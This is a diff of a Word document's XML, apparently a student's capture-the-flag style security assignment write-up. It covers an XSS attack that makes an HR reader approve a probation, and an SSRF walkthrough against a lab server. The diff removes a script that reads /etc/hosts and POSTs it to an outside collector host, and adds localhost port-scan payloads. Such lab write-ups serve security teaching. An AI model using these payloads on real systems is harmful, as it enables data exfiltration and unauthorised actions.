           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -11580,7 +11997,7 @@
                           <pic:cNvPicPr/>
                         </pic:nvPicPr>
                         <pic:blipFill>
-                          <a:blip r:embed="rId13" cstate="print">
+                          <a:blip r:embed="rId14" cstate="print">
                             <a:extLst>
                               <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                 <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -12591,7 +13008,7 @@
                           <pic:cNvPicPr/>
                         </pic:nvPicPr>
                         <pic:blipFill>
-                          <a:blip r:embed="rId14" cstate="print">
+                          <a:blip r:embed="rId15" cstate="print">
                             <a:extLst>
                               <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                 <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -12713,7 +13130,7 @@
                           <pic:cNvPicPr/>
                         </pic:nvPicPr>
                         <pic:blipFill>
-                          <a:blip r:embed="rId15"/>
+                          <a:blip r:embed="rId16"/>
                           <a:stretch>
                             <a:fillRect/>
                           </a:stretch>
@@ -12753,7 +13170,7 @@
               </w:rPr>
               <w:t xml:space="preserve">isiting </w:t>
             </w:r>
-            <w:hyperlink r:id="rId16" w:history="1">
+            <w:hyperlink r:id="rId17" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rStyle w:val="Hyperlink"/>
@@ -12838,7 +13255,16 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>&lt;!--</w:t>
+              <w:t>&lt;</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>!--</w:t>
             </w:r>
             <w:proofErr w:type="gramEnd"/>
             <w:r>
@@ -12848,7 +13274,34 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve"> xss.html --&gt;</w:t>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>xss</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>_1</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>.html --&gt;</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -13254,14 +13707,32 @@
               <w:rPr>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">njecting this payload as an anonymous question </w:t>
+              <w:t>njecting this payload as an anonymous question</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:lastRenderedPageBreak/>
-              <w:t>will make the user “</w:t>
+              <w:t>when it is opened,</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>the user “</w:t>
             </w:r>
             <w:proofErr w:type="spellStart"/>
             <w:r>
@@ -13275,19 +13746,37 @@
               <w:rPr>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>” pass the probation on behalf of the HR team member who reads the question and we have “Updated” as the response</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> instead</w:t>
+              <w:t>”</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> will</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> pass the probation on behalf of the HR team member</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> who reads the question</w:t>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t>.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> This gives us “Updated” as the response.</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -13317,7 +13806,7 @@
                           <pic:cNvPicPr/>
                         </pic:nvPicPr>
                         <pic:blipFill>
-                          <a:blip r:embed="rId17"/>
+                          <a:blip r:embed="rId18"/>
                           <a:stretch>
                             <a:fillRect/>
                           </a:stretch>
@@ -13379,7 +13868,7 @@
                           <pic:cNvPicPr/>
                         </pic:nvPicPr>
                         <pic:blipFill>
-                          <a:blip r:embed="rId18"/>
+                          <a:blip r:embed="rId19"/>
                           <a:stretch>
                             <a:fillRect/>
                           </a:stretch>
@@ -13633,6 +14122,54 @@
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
             </w:pPr>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New" w:hint="eastAsia"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>&lt;</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>!--</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>xxs_2.html --&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -14009,7 +14546,6 @@
           <w:p>
             <w:pPr>
               <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
             </w:pPr>
@@ -14026,7 +14562,7 @@
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:drawing>
-                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="13C7EAE4" wp14:editId="2DBA9C89">
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="13C7EAE4" wp14:editId="57F0A1CF">
                   <wp:extent cx="2128157" cy="1101812"/>
                   <wp:effectExtent l="0" t="0" r="5715" b="3175"/>
                   <wp:docPr id="8" name="Picture 8"/>
@@ -14041,7 +14577,7 @@
                           <pic:cNvPicPr/>
                         </pic:nvPicPr>
                         <pic:blipFill>
-                          <a:blip r:embed="rId19"/>
+                          <a:blip r:embed="rId20"/>
                           <a:stretch>
                             <a:fillRect/>
                           </a:stretch>
@@ -14049,7 +14585,7 @@
                         <pic:spPr>
                           <a:xfrm>
                             <a:off x="0" y="0"/>
-                            <a:ext cx="2196280" cy="1137081"/>
+                            <a:ext cx="2128157" cy="1101812"/>
                           </a:xfrm>
                           <a:prstGeom prst="rect">
                             <a:avLst/>
@@ -14086,6 +14622,8 @@
           <w:lang w:eastAsia="zh-CN"/>
         </w:rPr>
       </w:pPr>
+      <w:bookmarkStart w:id="53" w:name="_Section_3_–"/>
+      <w:bookmarkEnd w:id="53"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -14098,6 +14636,62 @@
           <w:lang w:eastAsia="zh-CN"/>
         </w:rPr>
         <w:t>ection 3 – Server-side request forgery exploitation walkthrough</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>The</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>f</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ollowing step shows using the server-side request forgery to get the background checks information in form of the flag. Each payload is placed at the end of </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId21" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:lang w:eastAsia="zh-CN"/>
+          </w:rPr>
+          <w:t>http://assignment-hermes.unimelb.life/validate.php?web=</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> .</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -14114,14 +14708,14 @@
         <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
       </w:tblPr>
       <w:tblGrid>
-        <w:gridCol w:w="786"/>
-        <w:gridCol w:w="4657"/>
-        <w:gridCol w:w="3576"/>
+        <w:gridCol w:w="659"/>
+        <w:gridCol w:w="4683"/>
+        <w:gridCol w:w="3677"/>
       </w:tblGrid>
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="846" w:type="dxa"/>
+            <w:tcW w:w="659" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -14153,7 +14747,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="5166" w:type="dxa"/>
+            <w:tcW w:w="4581" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -14185,7 +14779,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="3007" w:type="dxa"/>
+            <w:tcW w:w="3779" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -14219,7 +14813,7 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="846" w:type="dxa"/>
+            <w:tcW w:w="659" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -14239,409 +14833,75 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="5166" w:type="dxa"/>
+            <w:tcW w:w="4581" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New" w:hint="eastAsia"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>&lt;</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>!--</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> ssrf_1.html --&gt;</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>&lt;script&gt;</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">  var </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>xhr</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> = new </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>XMLHttpRequest</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>);</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:lastRenderedPageBreak/>
-              <w:t xml:space="preserve">  </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>xhr.onload</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> = function () {</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">    var xhr2 = new </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>XMLHttpRequest</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>);</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">    xhr2.open("POST", "https://hermes.free.beeceptor.com");</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">    xhr2.send("test=" + </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>this.responseText</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>);</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">  };</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">  </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>xhr.open</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>("GET", "/etc/hosts");</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">  </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>xhr.send</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>();</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>&lt;/script&gt;</w:t>
+              <w:pStyle w:val="ListParagraph"/>
+              <w:numPr>
+                <w:ilvl w:val="0"/>
+                <w:numId w:val="13"/>
+              </w:numPr>
+              <w:ind w:firstLineChars="0"/>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>http://localhost:</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>1</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ListParagraph"/>
+              <w:numPr>
+                <w:ilvl w:val="0"/>
+                <w:numId w:val="13"/>
+              </w:numPr>
+              <w:ind w:firstLineChars="0"/>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>http://localhost:2</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ListParagraph"/>
+              <w:numPr>
+                <w:ilvl w:val="0"/>
+                <w:numId w:val="13"/>
+              </w:numPr>
+              <w:ind w:firstLineChars="0"/>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>http://localhost:8873</w:t>
             </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="3007" w:type="dxa"/>
+            <w:tcW w:w="3779" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -14649,25 +14909,53 @@
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
             </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
-                <w:noProof/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:lastRenderedPageBreak/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>P</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>ort</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>-</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">scan the server till </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
